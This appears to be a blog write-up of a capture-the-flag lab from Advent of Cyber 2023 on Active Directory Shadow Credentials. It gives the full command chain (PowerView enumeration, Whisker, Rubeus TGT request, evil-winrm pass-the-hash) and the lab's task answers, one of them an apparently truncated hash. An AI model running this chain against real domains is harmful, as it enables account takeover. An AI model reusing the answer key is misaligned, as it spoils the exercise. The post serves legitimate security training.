Gunjan Mehta

Day 11 of Advent of Cyber 2023!

Gunjan Mehta's photo
Gunjan Mehta
·

3 min read

Back story:

AntarctiCrafts' technology stack had a distinct specialization in cutting-edge climate research, with less emphasis on robust cybersecurity measures. As the integration of the two infrastructure systems advances, vulnerabilities are emerging. Despite AntarctiCrafts' team demonstrating remarkable expertise, their small size necessitates a heightened focus on cybersecurity awareness.

In the ongoing audit, it's evident that some users still possess excessive permissions. While many of these instances were addressed in the previous audit, the question remains: Are all issues now resolved from the perspective of the HR user?

Learning Objectives

  • Understanding Active Directory

  • Introduction to Windows Hello for Business

  • Prerequisites for exploiting GenericWrite privilege

  • How the Shadow Credentials attack works

  • How to exploit the vulnerability

Understanding Active Directory (AD):

Active Directory (AD) is like a digital manager for businesses using Windows. It's a central hub that controls who can access what in a network. The Domain Controller (DC) is the core of AD, managing user information, authentication, and permissions.

Think of AD as a digital database with users, groups, and computers, each having specific settings. It follows the principle of least privilege, giving users access only to what they need. However, if permissions aren't managed well, it can pose security risks.

Windows Hello for Business (WHfB):

WHfB is a modern way to log in, replacing traditional passwords. It uses cryptographic keys stored in the AD. Each user has a public key in an attribute called msDS-KeyCredentialLink.

Authentication Process:

  1. Authorisation: DC decrypts pre-authentication data using the public key.

  2. Certificate generation: DC creates a certificate for the user.

  3. Authentication: User logs in using the certificate.

Enumeration (Checking Permissions):

To ensure security, we need to check if users have appropriate permissions. PowerShell script PowerView helps with this. Use the command Find-InterestingDomainAcl to list privileges. Focus on finding any write privileges.

cd C:\Users\hr\Desktop
powershell -ep bypass
. .\PowerView.ps1
Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq "hr" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights

Exploitation: Shadow Credentials Attack

  1. Find a user with GenericWrite privilege (e.g., "hr" on "Administrator").

  2. Use Whisker tool to simulate enrolling a malicious device.

.\Whisker.exe add /target:Administrator
  1. Whisker provides a certificate. Use Rubeus tool to request a Ticket Granting Ticket (TGT) for the user.
.\Rubeus.exe asktgt /user:Administrator /certificate:<CertificateGenerated> /password:"<GeneratedPassword>" /domain:AOC.local /dc:southpole.AOC.local /getcredentials /show

Exploit McRed:

With the obtained NTLM hash, use Evil-WinRM for remote access.

evil-winrm -i MACHINE_IP -u Administrator -H <NTLMHash>

Now, you can access the system remotely and retrieve the flag:

more C:\Users\Administrator\Desktop\flag.txt

Remember to replace placeholders like <CertificateGenerated>, <GeneratedPassword>, <NTLMHash>, and MACHINE_IP with the actual values.

Task 1:

What is the hash of the vulnerable user?

Answer: 03E805D8A8C5AA435FB48832DAD62

Task 2:

What is the content of flag.txt on the Administrator Desktop?

Answer: THM{XMAS_IS_SAFE}

#cybersecurityActive Directory